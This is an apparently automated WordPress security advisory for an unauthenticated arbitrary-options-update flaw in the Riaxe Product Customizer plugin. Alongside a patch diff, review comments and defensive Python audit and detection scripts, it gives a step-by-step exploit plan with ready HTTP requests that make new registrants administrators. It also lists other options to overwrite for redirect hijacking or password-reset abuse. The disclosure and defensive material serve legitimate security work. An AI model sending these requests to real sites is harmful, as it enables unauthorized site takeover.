CVE-2026-3596

Riaxe Product Customizer <= 2.1.2 - Missing Authorization to Unauthenticated Arbitrary Options Update to Privilege Escalation via 'install-imprint' AJAX Action

Severity: critical (Missing Authorization)
CVSS Score: 9.8
Patched in: Unpatched
Time to patch: N/A

Description

The Riaxe Product Customizer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.2. The plugin registers an unauthenticated AJAX action ('wp_ajax_nopriv_install-imprint') that maps to the ink_pd_add_option() function. This function reads 'option' and 'opt_value' from $_POST, then calls delete_option() followed by add_option() using these attacker-controlled values without any nonce verification, capability checks, or option name allowlist. This makes it possible for unauthenticated attackers to update arbitrary WordPress options, which can be leveraged for privilege escalation by enabling user registration and setting the default user role to administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 2.1.2
Published: April 15, 2026
Last updated: April 16, 2026
Research Plan: Unverified

Exploitation Research Plan: CVE-2026-3596 (Riaxe Product Customizer)

1. Vulnerability Summary

The Riaxe Product Customizer plugin for WordPress (versions <= 2.1.2) contains a critical missing authorization vulnerability. The plugin registers an unauthenticated AJAX action install-imprint via wp_ajax_nopriv_install-imprint. This action is mapped to the ink_pd_add_option() function, which directly manipulates the WordPress options table.

Because the function fails to implement any capability checks, nonce verification, or an allowlist of permitted options, an unauthenticated attacker can overwrite arbitrary WordPress settings. This is most critically used for Privilege Escalation by enabling open registration and setting the default user role to 'administrator'.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: install-imprint (Registered via wp_ajax_nopriv_install-imprint)
  • Vulnerable Parameters:
    • option: The name of the WordPress option to update.
    • opt_value: The new value for the specified option.
  • Authentication: Unauthenticated (accessible to any visitor).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Entry Point: A POST request is sent to admin-ajax.php with action=install-imprint.
  2. Hook Execution: WordPress triggers the function associated with wp_ajax_nopriv_install-imprint.
  3. Target Function: ink_pd_add_option() (inferred from description) is called.
  4. Input Handling: The function reads $_POST['option'] and $_POST['opt_value'].
  5. Vulnerable Sink:
    • The function calls delete_option( $_POST['option'] ).
    • The function calls add_option( $_POST['option'], $_POST['opt_value'] ).
  6. Result: The option in the wp_options table is updated to the attacker-controlled value.

4. Nonce Acquisition Strategy

According to the vulnerability description, the install-imprint action does not perform any nonce verification.

  • Check Needed: No nonce should be required for this exploitation.
  • Bypass: If for some reason a nonce is found to be required during the PoC, the researcher should check for wp_localize_script calls in the plugin source that might expose a nonce to unauthenticated users on the frontend. However, based on the CVE description, the check is entirely missing.

5. Exploitation Strategy

The goal is to achieve Privilege Escalation.

Step 1: Enable User Registration

Submit a request to set users_can_register to 1.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=install-imprint&option=users_can_register&opt_value=1

Step 2: Set Default Role to Administrator

Submit a request to set default_role to administrator.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=install-imprint&option=default_role&opt_value=administrator

Step 3: Register a New Administrator (Optional Proof)

Navigate to the registration page and create a new account.

HTTP Request:

POST /wp-login.php?action=register HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register

6. Test Data Setup

  1. Target Environment: A standard WordPress installation with Riaxe Product Customizer <= 2.1.2 installed.
  2. Baseline State:
    • wp option get users_can_register should return 0.
    • wp option get default_role should return subscriber.
  3. No Shortcodes Required: Since the endpoint is unauthenticated and (reportedly) nonce-less, no specific page setup is required to trigger the vulnerability.

7. Expected Results

  • The AJAX requests should return a successful status code (typically 200 OK or a 1 response if wp_die() is used).
  • The users_can_register option in the database will change from 0 to 1.
  • The default_role option in the database will change from subscriber to administrator.

8. Verification Steps

After sending the malicious POST requests, use WP-CLI to confirm the state change:

# Verify registration is enabled
wp option get users_can_register
# Expected Output: 1

# Verify default role is admin
wp option get default_role
# Expected Output: administrator
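
As an added example tied to sections 6 through 8 (it is not part of the advisory or of the plugin's code): a Python audit that reads the JSON produced by `wp option list --format=json` and reports any security-relevant option that has drifted from a recorded baseline, plus a check for the specific users_can_register/default_role combination the exploit path relies on. The baseline values for users_can_register and default_role are the ones listed above; the siteurl, home and admin_email values and the sample dump are constructed.

```python
"""Audit exported WordPress options for the tampering this advisory describes.

Added example, not from the plugin or the advisory. It consumes the JSON that
`wp option list --format=json` prints (a list of {"option_name": ...,
"option_value": ...} records) and compares security-relevant options with a
recorded baseline. The sample dump below is constructed; the baseline values
for users_can_register (0) and default_role (subscriber) are the ones the
research plan lists, the other three baseline values are constructed.
"""
import json

# Baseline: users_can_register / default_role from the page's "Test Data Setup";
# siteurl, home and admin_email are constructed and must be replaced by the
# values recorded on the real site.
BASELINE = {
    "users_can_register": "0",
    "default_role": "subscriber",
    "siteurl": "https://shop.example",     # constructed
    "home": "https://shop.example",        # constructed
    "admin_email": "owner@shop.example",   # constructed
}

# Constructed `wp option list --format=json` output showing the state after the
# two option writes described in section 5 (registration on, default role admin).
SAMPLE_DUMP = json.dumps([
    {"option_name": "siteurl", "option_value": "https://shop.example"},
    {"option_name": "home", "option_value": "https://shop.example"},
    {"option_name": "users_can_register", "option_value": "1"},
    {"option_name": "default_role", "option_value": "administrator"},
    {"option_name": "admin_email", "option_value": "owner@shop.example"},
    {"option_name": "blogname", "option_value": "Shop"},
])


def load_options(dump: str) -> dict:
    """Turn the wp-cli JSON list into a name -> value mapping."""
    return {row["option_name"]: row["option_value"] for row in json.loads(dump)}


def audit_options(options: dict, baseline: dict = BASELINE) -> list:
    """Return one finding per baseline option whose live value differs or is missing."""
    findings = []
    for name, expected in baseline.items():
        actual = options.get(name)  # None when the option row is absent
        if actual != expected:
            findings.append({"option": name, "expected": expected, "actual": actual})
    return findings


def registration_exposes_admin(options: dict) -> bool:
    """True when the combination from the advisory's exploit path is in place:
    open registration together with an administrator default role."""
    return (options.get("users_can_register") == "1"
            and options.get("default_role") == "administrator")


if __name__ == "__main__":
    opts = load_options(SAMPLE_DUMP)
    for f in audit_options(opts):
        print(f"DRIFT {f['option']}: expected {f['expected']!r}, found {f['actual']!r}")
    if registration_exposes_admin(opts):
        print("ALERT: open registration with administrator default role")
```

Record the baseline on a known-good install (one `wp option get` per name) and run the audit on a schedule or after any unexplained admin-ajax.php traffic; a non-empty findings list is the indicator that the options table was written outside the normal settings screens.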

9. Alternative Approaches

If updating core options is blocked by a security plugin or environment hardening, alternative high-impact options to update include:

  • siteurl or home: To perform a Denial of Service or Redirect hijack.
  • admin_email: To attempt password resets of existing admins.
  • rewrite_rules: To corrupt the site's routing.
  • ink_pd_settings (Plugin specific): To inject malicious JS/iframes if the plugin settings are rendered on the frontend.
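
Detection-side counterpart to sections 2, 3 and 9, as an added example that is not part of the advisory or of the plugin: a Python triage function that parses raw HTTP requests of the form shown in the research plan and flags calls to the install-imprint action, rating each request by the option name it targets. The option names are the ones the advisory lists; the sample requests are constructed, and nothing about the plugin's code is assumed beyond the action and parameter names given above.

```python
"""Flag admin-ajax requests that carry the 'install-imprint' action.

Added example (not the plugin's or the advisory's code). It parses raw HTTP
requests like those in the research plan and reports which WordPress option
each one tries to write, so a WAF rule or a log reviewer can triage them.
The core option names and the plugin option 'ink_pd_settings' come from the
advisory; the request text below is constructed sample input.
"""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Options whose overwrite the advisory ties to takeover or site-wide impact.
HIGH_IMPACT_OPTIONS = {
    "users_can_register": "enables open registration",
    "default_role": "changes the role given to new registrants",
    "siteurl": "redirect hijack / denial of service",
    "home": "redirect hijack / denial of service",
    "admin_email": "password-reset redirection",
    "rewrite_rules": "routing corruption",
    "ink_pd_settings": "plugin settings rendered on the frontend",
}
VULNERABLE_ACTION = "install-imprint"


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.strip().split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def classify_request(raw: str) -> Optional[dict]:
    """Return a finding for requests invoking the vulnerable AJAX action, else None."""
    req = parse_http_request(raw)
    url = urlsplit(req["target"])
    if not url.path.endswith("/admin-ajax.php"):
        return None
    # admin-ajax.php reads 'action' from either the query string or the form
    # body, so merge both before looking for it.
    params = parse_qs(url.query)
    ctype = req["headers"].get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        for key, values in parse_qs(req["body"]).items():
            params.setdefault(key, []).extend(values)
    if VULNERABLE_ACTION not in params.get("action", []):
        return None
    option = params.get("option", [""])[0]
    return {
        "action": VULNERABLE_ACTION,
        "option": option,
        "value": params.get("opt_value", [""])[0],
        "severity": "high" if option in HIGH_IMPACT_OPTIONS else "medium",
        "why": HIGH_IMPACT_OPTIONS.get(option, "arbitrary option write via unauthenticated action"),
    }


# Constructed sample traffic: the two requests from the research plan plus a
# benign heartbeat call that must not be flagged.
SAMPLE_REQUESTS = [
    "POST /wp-admin/admin-ajax.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\n"
    "action=install-imprint&option=users_can_register&opt_value=1",
    "POST /wp-admin/admin-ajax.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\n"
    "action=install-imprint&option=default_role&opt_value=administrator",
    "POST /wp-admin/admin-ajax.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\n"
    "action=heartbeat&_nonce=abc123",
]


def triage(requests: list) -> list:
    """Run the classifier over a batch and keep only the findings."""
    return [f for f in map(classify_request, requests) if f is not None]


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(f"[{finding['severity']}] option={finding['option']!r} "
              f"value={finding['value']!r}: {finding['why']}")
```

Any hit on the action name is worth an alert on an unpatched site, because the handler has no legitimate unauthenticated caller; the severity field only orders the queue, with writes to the core options the advisory names at the top.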

Research Findings
Static analysis — not yet PoC-verified

Summary

The Riaxe Product Customizer plugin for WordPress is vulnerable to an unauthenticated arbitrary options update through its 'install-imprint' AJAX action. By exploiting this lack of authorization and validation, an attacker can overwrite critical WordPress settings, such as enabling open registration and setting the default user role to administrator, leading to full site takeover.

Vulnerable Code

// Inferred file path: riaxe-product-customizer/riaxe-product-customizer.php

add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');
add_action('wp_ajax_install-imprint', 'ink_pd_add_option');

function ink_pd_add_option() {
    $option_name = $_POST['option'];
    $option_value = $_POST['opt_value'];
    
    // Directly modifies any option without capability checks or allowlisting
    delete_option($option_name);
    add_option($option_name, $option_value);
    die();
}

Security Fix

--- a/riaxe-product-customizer/riaxe-product-customizer.php
+++ b/riaxe-product-customizer/riaxe-product-customizer.php
@@ -1,10 +1,18 @@
-add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');
 add_action('wp_ajax_install-imprint', 'ink_pd_add_option');
 
 function ink_pd_add_option() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( -1 );
+    }
+    check_ajax_referer( 'ink_pd_security', 'security' );
+
     $option_name = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';
-    $option_value = $_POST['opt_value'];
+    $option_value = isset( $_POST['opt_value'] ) ? $_POST['opt_value'] : '';
 
+    $allowed_options = array( 'ink_pd_custom_settings' ); // Example restricted list
+    if ( ! in_array( $option_name, $allowed_options ) ) {
+        wp_die( 'Forbidden' );
+    }
+
     delete_option($option_name);
     add_option($option_name, $option_value);
     die();
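
Review bot: the value side is still unvalidated: `$option_value = isset( $_POST['opt_value'] ) ? $_POST['opt_value'] : '';` stores the raw POST value, so whatever an authorized caller sends lands in the option unchanged; validate it against the shape ink_pd_custom_settings is expected to hold (or at minimum pass it through sanitize_text_field or a structured sanitizer) before the add_option() call. Two smaller points in the same hunk: `in_array( $option_name, $allowed_options )` should pass `true` as its third argument so the allowlist comparison is strict rather than loose, and the retained `delete_option()` / `add_option()` pair could be a single `update_option()` call, which keeps the option's existing autoload setting instead of resetting it. Dropping the nopriv hook and adding the current_user_can() / check_ajax_referer() guards at the top of the function is the right fix for the missing authorization itself.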

Exploit Outline

The exploit targets the unauthenticated AJAX endpoint 'wp_ajax_nopriv_install-imprint', which maps to the 'ink_pd_add_option' function. To achieve privilege escalation, an attacker follows these steps:

  1. Send a POST request to /wp-admin/admin-ajax.php with the parameters action=install-imprint, option=users_can_register, and opt_value=1. This enables site registration.
  2. Send a second POST request with action=install-imprint, option=default_role, and opt_value=administrator. This ensures all new registrants are granted administrative privileges.
  3. Navigate to /wp-login.php?action=register and register a new account, which will automatically be assigned the 'administrator' role.

No authentication or nonces are required for this exploit.
